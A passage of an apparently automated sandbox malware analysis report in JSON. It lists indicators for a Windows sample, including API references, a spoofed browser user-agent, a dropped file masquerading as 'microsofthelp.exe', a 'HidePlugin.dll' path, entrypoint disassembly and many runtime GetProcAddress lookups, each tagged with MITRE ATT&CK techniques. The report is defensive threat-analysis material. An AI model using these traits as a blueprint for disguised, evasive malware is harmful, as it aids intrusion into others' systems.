Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsBadWritePtr\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsBadCodePtr\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetSetOptionExA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00005968.00000000.66608.002B0000.00000004.mdmp, 00000000-00005968.00000001.68534.002B0000.00000004.mdmp, 00000000-00005968.00000002.70456.002B0000.00000004.mdmp, 00000000-00005968.00000003.75889.002B0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CommandLineToArgvW\" (Indicator: \"CommandLineToArgv\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"CommandLineToArgvW\" (Indicator: \"CommandLineToArgv\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\microsofthelp.exe\" [Source: 00000000-00005932-00000BC1-55335432]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"FindResourceExW\" (Indicator: \"FindResource\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"FindResourceExW\" (Indicator: \"FindResource\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\HidePlugin.dll\" [Source: 00000000-00005968-00000C28-62664043]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"microsofthelp.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A480BA.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" file has an entrypoint instructions - \"push\t-1,push\t0x404611,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x630,push\tebx,push\tebp,push\tesi,push\tedi,mov\tecx, 0x40,xor\teax, eax,lea\tedi, [esp + 0x13d],mov\tbyte ptr [esp + 0x13c], 0,rep stosd\tdword ptr es:[edi], eax,stosw\tword ptr es:[edi], ax,stosb\tbyte ptr es:[edi], al,lea\teax, [esp + 0x13c],push\t0x104,push\teax,push\t0,call\tdword ptr [0x405050],lea\tecx, [esp + 0x14],call\t0x401e50,lea\tecx, [esp + 0x13c],push\t0,push\tecx,\"\n \"microsofthelp.exe.bin\" file has an entrypoint instructions - \"push\t-1,push\t0x404611,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x630,push\tebx,push\tebp,push\tesi,push\tedi,mov\tecx, 0x40,xor\teax, eax,lea\tedi, [esp + 0x13d],mov\tbyte ptr [esp + 0x13c], 0,rep stosd\tdword ptr es:[edi], eax,stosw\tword ptr es:[edi], ax,stosb\tbyte ptr es:[edi], al,lea\teax, [esp + 0x13c],push\t0x104,push\teax,push\t0,call\tdword ptr [0x405050],lea\tecx, [esp + 0x14],call\t0x401e50,lea\tecx, [esp + 0x13c],push\t0,push\tecx,\"\n \"DISMHOST.EXE.67A480BA.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005932)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00001432)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720b0000\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n 